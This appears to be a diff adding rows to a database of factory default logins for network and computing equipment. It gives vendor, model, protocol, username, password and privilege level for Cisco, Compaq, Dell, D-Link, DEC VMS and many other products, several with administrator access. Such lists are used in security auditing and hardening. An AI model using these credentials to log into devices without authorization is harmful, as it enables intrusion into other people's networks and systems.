+cisco,IOS,,SNMP,public ReadOnly access,secret,Read,, +cisco,IOS,,limited READ/WRITE,,ILMI,,, +cisco,IOS,11.x-12.x,SNMP,,ILMI,limited READ/WRITE,, +cisco,IOS,12.1(3),SNMP,,cable-docsis,SNMP read-write,, +cisco,IOS,2600 Series,Multi,,c,Admin,, +cisco,IP Conference Station,7936,HTTP,End User,7936,,, +cisco,MGX,,,superuser,superuser,,*, +cisco,NA,,,prixadmin,prixadmin,,NA, +cisco,Net Ranger 2.2.1,,,root,attack,,Sol 5.6, +cisco,Netranger/secure IDS,,,netrangr,attack,,, +cisco,Netranger/secure IDS,,3.0(5)S17,root,attack,,, +cisco,Netranger/secure IDS,,Admin,root,attack,,, +cisco,Netranger/secure IDS,,Multi,netrangr,attack,,, +cisco,Netranger/secure IDS,3.0(5)S17,Multi,root,attack,Admin,must be changed at the first connection, +cisco,Network Registrar (CNR),,,admin,changeme,,, +cisco,PIX firewall,,Telnet,,cisco,UID=pix,, +cisco,PIX,,,,cisco,,, +cisco,Traffic Anomaly Detector,,SNMP,,riverhead,,, +cisco,Trailhead,,4.0,admin,admin,,, +cisco,Trailhead,4.0,HTTP,admin,admin,Admin,, +cisco,Unity,,,EAdmin,,,, +cisco,Unity,,,ESubscriber,,,, +cisco,Unity,,,UAMIS_,,,, +cisco,Unity,,,UNITY_,,,, +cisco,Unity,,,UOMNI_,,,, +cisco,Unity,,,UVPIM_,,,, +cisco,Unity,,1.3.2,bubba,,,, +cisco,Unity,1.3.2,local,bubba,(unk),,Part numbers imprinted on the installation disks with a local user account bubba, +cisco,VPN 3000 Concentrator,,,admin,admin,,, +cisco,VPN Concentrator 3000 series,3,Multi,admin,admin,Admin,, +cisco,WLSE,,Multi,root,blender,Admin,, +cisco,WLSE,,Multi,wlse,wlsedb,Admin,, +cisco,any,,,no default login,no default password,,any IOS, +cisco,cva 122,,,admin,admin,,, +cisco,cva 122,,Admin,admin,admin,,, +cisco,cva 122,,Telnet,admin,admin,Admin,, +cisco-arrowpoint,Arrowpoint,,,admin,system,,, +cisco-arrowpoint,Arrowpoint,,Admin,admin,system,,, +claris,At-Ease,,,,familymacintosh,,, +cnet,804-nf,,Admin,Admin,epicrouter,,, +cnet,804-nf,,HTTP,Admin,epicrouter,Admin,, +cnet,804-nf,,HTTP,admin,password,http://,, +cnet,804-nf,,http:// ,admin,password,,, +cnet,CNET 4PORT ADSL MODEM,CNAD NF400,Multi,admin,epicrouter,Admin,, +cobalt,RaQ * Qube*,,,admin,admin,,Any, +cobalt,Unknown,,,admin,admin,,, +colubris,MSC,5100,user,admin,admin,admin,continue with https, +colubrisnetworks,MSC 5100,5100,http -> https,admin,admin,Admin,make exception for invalid certificate to continue with https, +comersus,Comersus Shopping Cart,3.2,,,admin,dmr99,, +comersus,Shopping Cart,,,admin,dmr99,,, +compaq,Familiar Linux,,,root,rootme,,, +compaq,Familiar Linux,,telnet/ssh/con,root,rootme,Admin,, +compaq,Insight Manager,,,PFCUser,240653C9467E45,,, +compaq,Insight Manager,,,PFCUser,240653C9467E45,User,, +compaq,Insight Manager,,,administrator,administrator,,, +compaq,Insight Manager,,,administrator,administrator,Admin,, +compaq,Insight Manager,,,anonymous,,,, +compaq,Insight Manager,,,anonymous,,User,, +compaq,Insight Manager,,,operator,operator,,, +compaq,Insight Manager,,,user,public,,, +compaq,Insight Manager,,,user,public,User,, +compaq,Insight Manager,,,user,user,,, +compaq,Insight Manager,,,user,user,User,, +compaq,Insight Manager,,Admin,administrator,administrator,,, +compaq,Insight Manager,,User,PFCUser,240653C9467E45,,, +compaq,Insight Manager,,User,anonymous,,,, +compaq,Insight Manager,,User,user,public,,, +compaq,Insight Manager,,User,user,user,,, +compaq,Management Agents,,,administrator,,,All, +compaq,Networth FastPipes,,,root,manager,,, +compaq,Networth FastPipes,,Console,root,manager,,, +compaq,PC BIOS,,,,Compaq,,, +compaq,PC BIOS,,Admin,,Compaq,,, +compaq,PC BIOS,,Console,,Compaq,Admin,, +compaq,T1010,,@ , ,use ALT+G at boot to reset config,,, +compaq,T1010,,Multi,,use ALT+G at boot to reset config,@,, +compaq,WBEM,,,administrator,administrator,,, +compaq,WBEM,,HTTP 2301 / HTTPS 2381,administrator,administrator,Admin,, +compex,NetPassage 15BR,,http://192.168.168.1,,password,Administration,, +compex,NetPassage 18,,http://192.168.168.1,,password,Administration,, +compualynx,Cmail Server,,All Versions,administrator,asecret,,, +compualynx,Cmail Server,all,multi,administrator,asecret,Admin,, +compualynx,Cproxy Server,,All Versions,administrator,asecret,,, +compualynx,Cproxy Server,all,multi,administrator,asecret,Admin,, +compualynx,SCM,,All Versions,administrator,asecret,,, +compualynx,SCM,all,multi,administrator,asecret,Admin,, +computer associates,ControlIT,,,DEFAULT,default,,, +computer associates,ControlIT,,Desktop/console access,DEFAULT,default,,, +computerassociates,ControlIT,,ControlIT,DEFAULT,default,Desktop/console access,, +comtrend,CT-5361T,,192.168.1.1,root,12345,,, +comtrend,CT-5361T,,http192.168.2.1,user,12345,View Device Info, and Error Log., +comtrend,CT560,,http://192.168.1.1,aolbb,setup,Admin,, +comtrend,ct536+,,Multi,admin,,Admin,, +conceptronic,C100BRS4H,,,admin,1234,,, +conceptronic,C100BRS4H,,HTTP,admin,1234,,, +conceptronic,CADSLR4,,HTTP/telnet,admin,password,Admin,Default IP 192.168.1.254, +conceptronic,CADSLR4,,HTTP/telnet,anonymous,password,anon,Default IP 192.168.1.254, +conceptronic,CFULLHDMAi,,telnet port 4836,,conceptronic2008,,, +conceptronic,cdeskcam,1.0,,conceptronic,,,camera, +concord,PC BIOS,,,,last,,, +concord,PC BIOS,,,,last,Admin,, +concord,PC BIOS,,Admin,,last,,, +conexant,ACCESS RUNNER ADSL CONSOLE PORT 3.27,,Telnet,Administrator,admin,Admin,, +conexant,PAE-CE81,,,admin,epicrouter,,, +conexant,PAE-CE81,,Multi,admin,epicrouter,,, +conexant,Router,,HTTP,,admin,Admin,yes, +conexant,Router,,HTTP,,epicrouter,Admin,, +conexant,Router,,HTTP,admin,amigosw1,Admin,, +conexant,Router,,HTTP,admin,conexant,Admin,, +conexant,Router,,HTTP,admin,epicrouter,Admin,, +conexant,Router,,HTTP,admin,password,Admin,, +conexant,four port ethernet switch,,,admin,epicrouter,,, +conitec,3D Gamestudio,,Capek,Adam,29111991,,, +conitec,3D Gamestudio,6.22,Serial,Adam,29111991,Capek,, +corecess,3113,,Multi,admin,,Admin,, +corecess,6808 APC,,Telnet,corecess,corecess,User,, +corecess,Corecess 3112,,HTTP,Administrator,admin,Admin,, +coyotepoint,Equaliser 4,,,eqadmin - Serial port only,equalizer,,Free BSD, +coyotepoint,Equaliser 4,,,look,look,,Free BSD - Web Browser only, +coyotepoint,Equaliser 4,,,root ,,,Free BSD - Serial port only, +coyotepoint,Equaliser 4,,,touch,touch,,Free BSD - Web Browser only, +creative,2015U,,Multi,,,Admin,, +crystalview,OutsideView 32,,,,Crystal,,, +crystalview,OutsideView 32,,,,Crystal,Admin,, +crystalview,OutsideView 32,,Admin,,Crystal,,, +ctcunion,ATU-R130,81001a,Multi,root,root,Admin,, +ctx international,PC BIOS,,,,CTX_123,,, +ctx international,PC BIOS,,Admin,,CTX_123,,, +ctxinternational,PC BIOS,,Console,,CTX_123,Admin,, +cyberguard,Firewall,,,cgadmin,cgadmin,,, +cyberguard,SG300,,http://192.168.0.1,root,default,Administration,, +cyberguard,SG560,,http://192.168.0.1,root,default,Administration,, +cyberguard,SG565,,http://192.168.0.1,root,default,Administration,, +cyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin,, +cybermax,PC BIOS,,,,Congress,,, +cybermax,PC BIOS,,Admin,,Congress,,, +cybermax,PC BIOS,,Console,,Congress,Admin,, +cyclades,Cyclades-TS800,,TS800,root,tslinux,,, +cyclades,MP/RT,,,super,surt,,, +cyclades,PR-1000,,,super,surt,,, +cyclades,PR-1000,,Telnet,super,surt,Admin,, +cyclades,PR1000,,,super,surt,,, +cyclades,TS800,,HTTP,root,tslinux,Admin,, +cyclades,TS800,,telnet/ssh/http,root,,Admin,, +d-link,604,,,Admin,,,, +d-link,Cable/DSL Routers/Switches,,Admin,,admin,,, +d-link,D-704P,,rev b,admin,,,, +d-link,DCS-1000,,admin,,,,, +d-link,DI-524,,Admin,admin,,,, +d-link,DI-604,,Admin,user,,,, +d-link,DI-604,,rev a rev b rev c rev e,admin,,,, +d-link,DI-614+,,Admin,admin,,,, +d-link,DI-614+,,User,user,,,, +d-link,DI-624,,,admin,,,, +d-link,DI-624,,192.168.0.1,Admin,,,, +d-link,DI-701,,Admin,admin,year2000,,, +d-link,DI-704,,rev a,,admin,,, +d-link,DI-714P+,,192.168.0.1,admin,____BLANK___,,, +d-link,DI-804,,Admin,admin,,,, +d-link,DI-804,,v2.03,admin,,,, +d-link,DSL-300,,,,private,,, +d-link,DSL-300G+,,admin?,,private,,, +d-link,DSL-504,,,,private,,, +d-link,DSL-G664T,,,admin,admin,,, +d-link,DWL 900AP,,,,public,,, +d-link,DWL 900AP,,Admin,admin,public,,, +d-link,Routers,,DI-764,admin,,,, +d-link,hubs/switches,,,D-Link,D-Link,,, +daewoo,PC BIOS,,,,Daewuu,,, +daewoo,PC BIOS,,Admin,,Daewuu,,, +daewoo,PC BIOS,,Console,,Daewuu,Admin,, +dallas semiconductors,TINI embedded JAVA Module,,<= 1.0,root,tini,,, +dallas semiconductors,TINI embedded JAVA Module,,Admin,root,tini,,, +dallas semiconductors,TINI embedded JAVA Module,,tini,Telnet,root,,, +dallassemiconductors,TINI embedded JAVA Module,1.0 or lower,Telnet,root,tini,Admin,, +dallassemiconductors,TINI embedded JAVA Module,1.0,Telnet,root,tini,Admin,, +dallassemiconductors,TINI embedded JAVA Module,below 1.0,Telnet,root,tini,Admin,, +darkman,ioFTPD,,root,ioFTPD,ioFTPD,,, +darkman,ioFTPD,all,Other,ioFTPD,ioFTPD,root,, +data general,AOS/VS,,,op,operator,,, +data general,AOS/VS,,,operator,operator,,, +datacom,BSASX/101,,,,letmein,,, +datacom,BSASX/101,,,,letmein,Admin,, +datacom,BSASX/101,,Admin,,letmein,,, +datacom,NSBrowse,,,sysadm,sysadm,,, +datacom,NSBrowse,,,sysadm,sysadm,Admin,, +datageneral,AOS/VS,,multi,op,op,Admin,, +datageneral,AOS/VS,,multi,op,operator,Admin,, +datageneral,AOS/VS,,multi,operator,operator,Admin,, +datawizard.net,FTPXQ server,,,anonymous,any@,,, +datawizard.net,FTPXQ server,,read/write,anonymous,any,,, +datawizardtechnologiesinc,FtpQX server,,FTP,anonymous,(any),Read only on C: by default,, +datawizardtechnologiesinc,FtpQX server,,FTP,test,test,Test user has R/W permission on C: drive by default,, +davolink,DV2020,,Http://192.168.1.1,user,user,user settings,, +davox,Unison,,Multi,admin,admin,User,, +davox,Unison,,Multi,davox,davox,User,, +davox,Unison,,Multi,root,davox,Admin,, +davox,Unison,,Sybase,sa,,Admin,, +daytek,PC BIOS,,,,Daytec,,, +daytek,PC BIOS,,Admin,,Daytec,,, +daytek,PC BIOS,,Console,,Daytec,Admin,, +debian,Linux LILO Default,,2.2,,tatercounter2000,,, +debian,Linux LILO Default,2.2,console,,tatercounter2000,Admin,, +decnet,decnet,,,operator,admin,,, +decnet,decnet,,Guest,operator,admin,,, +deerfield,MDaemon,,HTTP,MDaemon,MServer,Admin,web interface to manage MDaemon. fixed June 2002, +deerfield,WorldClient and MDaemon,,5.0.5.0,MDaemon,MServer,,, +deerfield,WorldClient,5.0.5.0,,MDaemon,MServer,,Can be used to send/recv mail remotely, +dell latitude cpx,dell,,,admin,admin,,, +dell,CSr500xt,,,,admin,,, +dell,CSr500xt,,Admin,,admin,,, +dell,CSr500xt,,Multi,,admin,Admin,, +dell,DRAC,,,root,calvin,management,, +dell,ERA,,,root,calvin,,, +dell,ERA,,,root,calvin,Admin - Embedded remote access,, +dell,Inspiron,,Multi,,admin,Admin,, +dell,Laser Printer 3000cn / 3100cn,,HTTP,admin,password,Admin,, +dell,Latitude CMOS,CPi,console,,nx0nu4bbe,,Enter password then CTRL+Enter, +dell,Latitude,,Admin,,1RRWTTOOI,,, +dell,Latitude,,Bios D35B,,1RRWTTOOI,,, +dell,Latitude,Bios D35B,Multi,,1RRWTTOOI,Admin,, +dell,Lattitude CMOS,,CPi,,nz0u4bbe,,, +dell,OpenManage Server Console,,,root,calvin,,, +dell,OpenManage Server Console,,Admin,root,calvin,,, +dell,OpenManage Server Console,,Console,root,calvin,Admin,, +dell,PC BIOS,,,,Dell,,, +dell,PC BIOS,,Admin,,Dell,,, +dell,PC BIOS,,Console,,Dell,Admin,, +dell,PowerEdge 1655MC,,,admin,admin,Admin,, +dell,PowerEdge 2650 RAC,,,root,calvin,,, +dell,PowerEdge 2650 RAC,,HTTP,root,calvin,,, +dell,PowerVault 35F,,,root,calvin,,, +dell,PowerVault 50F,,,root,calvin,,, +dell,PowerVault TL-2000/4000,,http://,Admin,secure,,, +dell,Powerapp Web 100 Linux,,,root,powerapp,,RedHat 6.2, +dell,Poweredge,,1655MC,admin,admin,,, +dell,RAC,,,root,calvin,,, +dell,Remote Access Card,,HTTP,root,calvin,Admin,, +dell,Switch PowerConnect,,,admin,admin,,, +dell,Switch PowerConnect,,,admin,admin,Admin,, +dell,TrueMobile 1184 Wireless Broadband Gateway Router,,Admin,admin,admin,,, +dell,TrueMobile 1184 Wireless Broadband Gateway Router,,unknown,admin,admin,,, +dell,TrueMobile 1184 Wireless Broadband Gateway Router,unknown,HTTP,admin,admin,Admin,, +dell,TrueMobile 2300 Router,,,admin,admin,,, +dell,inspiron,,,,admin,,, +dell,inspiron,,Admin,,admin,,, +dell,latitude,,a05,,admin,,, +demarc,Network Monitor,,,admin,my_DEMARC,,, +demarc,Network Monitor,,Admin,admin,my_DEMARC,,, +demarc,Network Monitor,,multi,admin,my_DEMARC,Admin,, +deutschetelekom,T-Sinus 130 DSL,,HTTP,,0,Admin,, +deutschetelekom,T-Sinus 154 DSL,13.9.38,HTTP,,0,Admin,thx to AwdCzAb, +deutschetelekom,T-Sinus DSL 130,,HTTP,admin,,Admin,Usuallay also a WirelessLan AP :), +develcon,Orbitor Default Console,,,,BRIDGE,,, +develcon,Orbitor Default Console,,,,BRIDGE,Admin,, +develcon,Orbitor Default Console,,,,password,,, +develcon,Orbitor Default Console,,,,password,Admin,, +develcon,Orbitor Default Console,,Admin,,BRIDGE,,, +develcon,Orbitor Default Console,,Admin,,password,,, +dictaphone,ProLog,,,NETOP,,,, +dictaphone,ProLog,,,NETWORK,NETWORK,,, +dictaphone,ProLog,,,PBX,PBX,,, +digiboard,Portserver 8 & 16,,,root,dbps,,any, +digicom,Michelangelo,,Multi,admin,michelangelo,Admin,, +digicom,Michelangelo,,Multi,user,password,User,, +digicorp,Router,,,,BRIDGE,Admin,, +digicorp,Router,,,,password,Admin,, +digicorp,Viper,,,,BRIDGE,,, +digicorp,Viper,,Admin,,BRIDGE,,, +digicorp,Viper,,Admin,,password,,, +digicorp,Viper,,Telnet,,BRIDGE,Admin,, +digicorp,Viper,,Telnet,,password,Admin,, +digicraft software,Yak!,,2.0.1,Yak,asd123,,, +digicraftsoftware,Yak!,2.0.1,FTP (default port 3535),Yak,asd123,,, +digiinternational,Digi One SP,all versions,http,root,dbps,Full configuration,Device default to DHCP for IP address., +digital equipment,10-Dec,,,1,manager,,, +digital equipment,10-Dec,,,2,maintain,,, +digital equipment,10-Dec,,,2,operator,,, +digital equipment,10-Dec,,,30,games,,, +digital equipment,10-Dec,,,5,games,,, +digital equipment,10-Dec,,,7,maintain,,, +digital equipment,DEC-10,,,1,manager,,, +digital equipment,DEC-10,,,2,operator,,, +digital equipment,DEC-10,,,30,games,,, +digital equipment,DEC-10,,,5,games,,, +digital equipment,DEC-10,,,7,maintain,,, +digital equipment,DEC-10,,Admin,1,manager,,, +digital equipment,DEC-10,,Admin,1,operator,,, +digital equipment,DEC-10,,Admin,1,syslib,,, +digital equipment,DEC-10,,Admin,2,maintain,,, +digital equipment,DEC-10,,Admin,2,manager,,, +digital equipment,DEC-10,,Admin,2,operator,,, +digital equipment,DEC-10,,Admin,2,syslib,,, +digital equipment,DEC-10,,User,30,games,,, +digital equipment,DEC-10,,User,5,games,,, +digital equipment,DEC-10,,User,7,maintain,,, +digital equipment,DecServer,,,,ACCESS,,, +digital equipment,DecServer,,Admin,,ACCESS,,, +digital equipment,DecServer,,Admin,,SYSTEM,,, +digital equipment,IRIS,,,PDP11,PDP11,,, +digital equipment,IRIS,,,PDP8,PDP8,,, +digital equipment,IRIS,,,accounting,accounting,,, +digital equipment,IRIS,,,boss,boss,,, +digital equipment,IRIS,,,demo,demo,,, +digital equipment,IRIS,,,manager,manager,,, +digital equipment,IRIS,,,software,software,,, +digital equipment,IRIS,,Admin,accounting,accounting,,, +digital equipment,IRIS,,Admin,boss,boss,,, +digital equipment,IRIS,,Admin,manager,manager,,, +digital equipment,IRIS,,User,PDP11,PDP11,,, +digital equipment,IRIS,,User,PDP8,PDP8,,, +digital equipment,IRIS,,User,demo,demo,,, +digital equipment,IRIS,,User,software,software,,, +digital equipment,PC BIOS,,,,komprie,,, +digital equipment,PC BIOS,,Admin,,komprie,,, +digital equipment,RSX,,,,1,,, +digital equipment,RSX,,,1.1,SYSTEM,,, +digital equipment,RSX,,,BATCH,BATCH,,, +digital equipment,RSX,,,SYSTEM,MANAGER,,, +digital equipment,RSX,,,USER,USER,,, +digital equipment,RSX,,Admin,1.1,SYSTEM,,, +digital equipment,RSX,,Admin,SYSTEM,MANAGER,,, +digital equipment,RSX,,Admin,SYSTEM,SYSTEM,,, +digital equipment,RSX,,User,BATCH,BATCH,,, +digital equipment,RSX,,User,USER,USER,,, +digital equipment,Terminal Server,,,,access,,, +digital equipment,Terminal Server,,,,system,,, +digital equipment,Terminal Server,,Admin,,system,,, +digital equipment,Terminal Server,,User,,access,,, +digital equipment,VMS,,,ALLIN1,ALLIN1,,, +digital equipment,VMS,,,ALLIN1MAIL,ALLIN1MAIL,,, +digital equipment,VMS,,,ALLINONE,ALLINONE,,, +digital equipment,VMS,,,BACKUP,BACKUP,,, +digital equipment,VMS,,,DCL,DCL,,, +digital equipment,VMS,,,DECMAIL,DECMAIL,,, +digital equipment,VMS,,,DECNET,DECNET,,, +digital equipment,VMS,,,DECNET,NONPRIV,,, +digital equipment,VMS,,,DEFAULT,DEFAULT,,, +digital equipment,VMS,,,DEFAULT,USER,,, +digital equipment,VMS,,,DEMO,DEMO,,, +digital equipment,VMS,,,FIELD,DIGITAL,,, +digital equipment,VMS,,,FIELD,FIELD,,, +digital equipment,VMS,,,FIELD,SERVICE,,, +digital equipment,VMS,,,FIELD,TEST,,, +digital equipment,VMS,,,GUEST,GUEST,,, +digital equipment,VMS,,,HELP,HELP,,, +digital equipment,VMS,,,HELPDESK,HELPDESK,,, +digital equipment,VMS,,,HOST,HOST,,, +digital equipment,VMS,,,INFO,INFO,,, +digital equipment,VMS,,,INGRES,INGRES,,, +digital equipment,VMS,,,LINK,LINK,,, +digital equipment,VMS,,,MAILER,MAILER,,, +digital equipment,VMS,,,MBMANAGER,MBMANAGER,,, +digital equipment,VMS,,,MBWATCH,MBWATCH,,, +digital equipment,VMS,,,NETCON,NETCON,,, +digital equipment,VMS,,,NETMGR,NETMGR,,, +digital equipment,VMS,,,NETNONPRIV,NETNONPRIV,,, +digital equipment,VMS,,,NETPRIV,NETPRIV,,, +digital equipment,VMS,,,NETSERVER,NETSERVER,,, +digital equipment,VMS,,,NETWORK,NETWORK,,, +digital equipment,VMS,,,NEWINGRES,NEWINGRES,,, +digital equipment,VMS,,,NEWS,NEWS,,, +digital equipment,VMS,,,OPERVAX,OPERVAX,,, +digital equipment,VMS,,,POSTMASTER,POSTMASTER,,, +digital equipment,VMS,,,PRIV,PRIV,,, +digital equipment,VMS,,,REPORT,REPORT,,, +digital equipment,VMS,,,RJE,RJE,,, +digital equipment,VMS,,,STUDENT,STUDENT,,, +digital equipment,VMS,,,SYS,SYS,,, +digital equipment,VMS,,,SYSMAINT,DIGITAL,,, +digital equipment,VMS,,,SYSMAINT,SERVICE,,, +digital equipment,VMS,,,SYSMAINT,SYSMAINT,,, +digital equipment,VMS,,,SYSTEM,MANAGER,,, +digital equipment,VMS,,,SYSTEM,OPERATOR,,, +digital equipment,VMS,,,SYSTEM,SYSLIB,,, +digital equipment,VMS,,,SYSTEM,SYSTEM,,, +digital equipment,VMS,,,SYSTEST,UETP,,, +digital equipment,VMS,,,SYSTEST_CLIG,SYSTEST,,, +digital equipment,VMS,,,SYSTEST_CLIG,SYSTEST_CLIG,,, +digital equipment,VMS,,,TELEDEMO,TELEDEMO,,, +digital equipment,VMS,,,TEST,TEST,,, +digital equipment,VMS,,,UETP,UETP,,, +digital equipment,VMS,,,USER,PASSWORD,,, +digital equipment,VMS,,,USERP,USERP,,, +digital equipment,VMS,,,VAX,VAX,,, +digital equipment,VMS,,,VMS,VMS,,, +digitalequipment,DEC-10,,Multi,1,manager,Admin,, +digitalequipment,DEC-10,,Multi,1,operator,Admin,, +digitalequipment,DEC-10,,Multi,1,syslib,Admin,, +digitalequipment,DEC-10,,Multi,2,maintain,Admin,, +digitalequipment,DEC-10,,Multi,2,manager,Admin,, +digitalequipment,DEC-10,,Multi,2,operator,Admin,, +digitalequipment,DEC-10,,Multi,2,syslib,Admin,, +digitalequipment,DEC-10,,Multi,30,games,User,, +digitalequipment,DEC-10,,Multi,5,games,User,, +digitalequipment,DEC-10,,Multi,7,maintain,User,, +digitalequipment,DecServer,,Multi,,ACCESS,Admin,, +digitalequipment,DecServer,,Multi,,SYSTEM,Admin,, +digitalequipment,IRIS,,Multi,PDP11,PDP11,User,, +digitalequipment,IRIS,,Multi,PDP8,PDP8,User,, +digitalequipment,IRIS,,Multi,accounting,accounting,Admin,, +digitalequipment,IRIS,,Multi,boss,boss,Admin,, +digitalequipment,IRIS,,Multi,demo,demo,User,, +digitalequipment,IRIS,,Multi,manager,manager,Admin,, +digitalequipment,IRIS,,Multi,software,software,User,, +digitalequipment,PC BIOS,,Console,,komprie,Admin,, +digitalequipment,RSX,,Multi,1,,Level 1,, +digitalequipment,RSX,,Multi,1.1,SYSTEM,Admin,, +digitalequipment,RSX,,Multi,BATCH,BATCH,User,, +digitalequipment,RSX,,Multi,SYSTEM,MANAGER,Admin,, +digitalequipment,RSX,,Multi,SYSTEM,SYSTEM,Admin,, +digitalequipment,RSX,,Multi,USER,USER,User,, +digitalequipment,Terminal Server,,Port 7000,,access,User,, +digitalequipment,Terminal Server,,Port 7000,,system,Admin,, +digitalequipment,VMS,,Multi,ALLIN1,ALLIN1,,, +digitalequipment,VMS,,Multi,ALLIN1MAIL,ALLIN1MAIL,,, +digitalequipment,VMS,,Multi,ALLINONE,ALLINONE,,, +digitalequipment,VMS,,Multi,BACKUP,BACKUP,,, +digitalequipment,VMS,,Multi,DCL,DCL,,, +digitalequipment,VMS,,Multi,DECMAIL,DECMAIL,,, +digitalequipment,VMS,,Multi,DECNET,DECNET,,, +digitalequipment,VMS,,Multi,DECNET,NONPRIV,,, +digitalequipment,VMS,,Multi,DEFAULT,DEFAULT,,, +digitalequipment,VMS,,Multi,DEFAULT,USER,,, +digitalequipment,VMS,,Multi,DEMO,DEMO,,, +digitalequipment,VMS,,Multi,FIELD,DIGITAL,,, +digitalequipment,VMS,,Multi,FIELD,FIELD,,, +digitalequipment,VMS,,Multi,FIELD,SERVICE,,, +digitalequipment,VMS,,Multi,FIELD,TEST,,, +digitalequipment,VMS,,Multi,GUEST,GUEST,,, +digitalequipment,VMS,,Multi,HELP,HELP,,, +digitalequipment,VMS,,Multi,HELPDESK,HELPDESK,,, +digitalequipment,VMS,,Multi,HOST,HOST,,, +digitalequipment,VMS,,Multi,INFO,INFO,,, +digitalequipment,VMS,,Multi,INGRES,INGRES,,, +digitalequipment,VMS,,Multi,LINK,LINK,,, +digitalequipment,VMS,,Multi,MAILER,MAILER,,, +digitalequipment,VMS,,Multi,MBMANAGER,MBMANAGER,,, +digitalequipment,VMS,,Multi,MBWATCH,MBWATCH,,, +digitalequipment,VMS,,Multi,NETCON,NETCON,,, +digitalequipment,VMS,,Multi,NETMGR,NETMGR,,, +digitalequipment,VMS,,Multi,NETNONPRIV,NETNONPRIV,,, +digitalequipment,VMS,,Multi,NETPRIV,NETPRIV,,, +digitalequipment,VMS,,Multi,NETSERVER,NETSERVER,,, +digitalequipment,VMS,,Multi,NETWORK,NETWORK,,, +digitalequipment,VMS,,Multi,NEWINGRES,NEWINGRES,,, +digitalequipment,VMS,,Multi,NEWS,NEWS,,, +digitalequipment,VMS,,Multi,OPERVAX,OPERVAX,,, +digitalequipment,VMS,,Multi,POSTMASTER,POSTMASTER,,, +digitalequipment,VMS,,Multi,PRIV,PRIV,,, +digitalequipment,VMS,,Multi,REPORT,REPORT,,, +digitalequipment,VMS,,Multi,RJE,RJE,,, +digitalequipment,VMS,,Multi,STUDENT,STUDENT,,, +digitalequipment,VMS,,Multi,SYS,SYS,,, +digitalequipment,VMS,,Multi,SYSMAINT,DIGITAL,,, +digitalequipment,VMS,,Multi,SYSMAINT,SERVICE,,, +digitalequipment,VMS,,Multi,SYSMAINT,SYSMAINT,,, +digitalequipment,VMS,,Multi,SYSTEM,MANAGER,,, +digitalequipment,VMS,,Multi,SYSTEM,OPERATOR,,, +digitalequipment,VMS,,Multi,SYSTEM,SYSLIB,,, +digitalequipment,VMS,,Multi,SYSTEM,SYSTEM,,, +digitalequipment,VMS,,Multi,SYSTEST,UETP,,, +digitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST,,, +digitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST_CLIG,,, +digitalequipment,VMS,,Multi,TELEDEMO,TELEDEMO,,, +digitalequipment,VMS,,Multi,TEST,TEST,,, +digitalequipment,VMS,,Multi,UETP,UETP,,, +digitalequipment,VMS,,Multi,USER,PASSWORD,,, +digitalequipment,VMS,,Multi,USERP,USERP,,, +digitalequipment,VMS,,Multi,VAX,VAX,,, +digitalequipment,VMS,,Multi,VMS,VMS,,, +digitalequipment,decnet,,Multi,operator,admin,Guest,, +discar,PMC30,,,SUPERVISOR,DISCAR,,, +discar,PMC30,TODAS,Multi,SUPERVISOR,DISCAR,,, +dlink,,dir 655,,admin,blank,,, +dlink,All Models,All Versions,192.168.0.1,,211cmw91765,user,, +dlink,Cable/DSL Routers/Switches,,Multi,,admin,Admin,, +dlink,D-704P,,Multi,admin,admin,Admin,, +dlink,D-704P,rev b,Multi,admin,,Admin,, +dlink,DCS-1000,,HTTP,,,admin,, +dlink,DFL-1100 firewall,,HTTP,admin,,Admin,, +dlink,DFL-1600 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,, +dlink,DFL-200 firewall,,HTTP,admin,,Admin,, +dlink,DFL-200 firewall,,HTTP,admin,admin,Admin,, +dlink,DFL-210 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,, +dlink,DFL-300 firewall,,http://192.168.1.1,admin,admin,Admin,, +dlink,DFL-700 firewall,,HTTP,admin,,Admin,, +dlink,DFL-80 firewall,,http://192.168.1.1,admin,admin,Admin,, +dlink,DFL-CP310 firewall,,http://my.firewall,admin,Management Interface Admin,, +dlink,DFL-CPG310 firewall,,http://my.firewall,admin,Management Interface Admin,, +dlink,DFL-M510 firewall,,http://192.168.1.1,admin,admin,Admin,, +dlink,DGL-4100,,http://192.168.0.1,,,Administration,, +dlink,DGL-4300,,http://192.168.0.1,,,Administration,, +dlink,DGL-4500,,http://192.168.0.1,,,Administration,, +dlink,DI-106,,,administrator,@*nigU^D.ha,,winnt, +dlink,DI-206 ISDN router,,,Admin,Admin,,1.*, +dlink,DI-514 Router,,HTTP,admin,,,, +dlink,DI-514,,Multi,user,,Admin,, +dlink,DI-524,all,HTTP,admin,,Admin,http://192.168.0.1, +dlink,DI-524,all,HTTP,user,,User,, +dlink,DI-604,,HTTP,user,,Admin,, +dlink,DI-604,1.62b+,HTTP,admin,,Admin,, +dlink,DI-604,2.02,HTTP,admin,admin,Admin,, +dlink,DI-604,rev a rev b rev c rev e,Multi,admin,,Admin,http://192.168.0.1, +dlink,DI-614+,,HTTP,admin,,Admin,, +dlink,DI-614+,,HTTP,admin,admin,Admin,, +dlink,DI-614+,,HTTP,user,,User,, +dlink,DI-614+,any,HTTP,admin,,Admin,all access :D, +dlink,DI-614,,HTTP,admin,,Admin,, +dlink,DI-624+,,HTTP,admin,,,, +dlink,DI-624+,A3,HTTP,admin,admin,Admin,, +dlink,DI-624,,http://192.168.0.1,Admin,,admin,, +dlink,DI-624,all,HTTP,User,,Admin,, +dlink,DI-624M,,http://192.168.0.1,admin,,Administration,, +dlink,DI-624S,,http://192.168.0.1,admin,,Administration,, +dlink,DI-634M,,http://192.168.0.1,admin,,Administration,, +dlink,DI-701,unknown,Multi,admin,year2000,Admin,, +dlink,DI-704,,Multi,,admin,Admin,, +dlink,DI-704,rev a,Multi,,admin,Admin,Cable/DSL Routers/Switches, +dlink,DI-704P,,http://192.168.0.1,admin,,Administration,, +dlink,DI-704UP,,http://192.168.0.1,admin,,Administration,, +dlink,DI-707P,,HTTP,admin,,Admin,, +dlink,DI-714 Router,,HTTP,admin,,,, +dlink,DI-714P+,,Multi,admin,,192.168.0.1,, +dlink,DI-724GU,,http://192.168.0.1,admin,,Administration,, +dlink,DI-724P+ Router,,HTTP,admin,,,, +dlink,DI-724U,,http://192.168.0.1,admin,,Administration,, +dlink,DI-764,,HTTP,admin,,Admin,, +dlink,DI-784 Router,,HTTP,admin,,,, +dlink,DI-804,v2.03,Multi,admin,,Admin,, 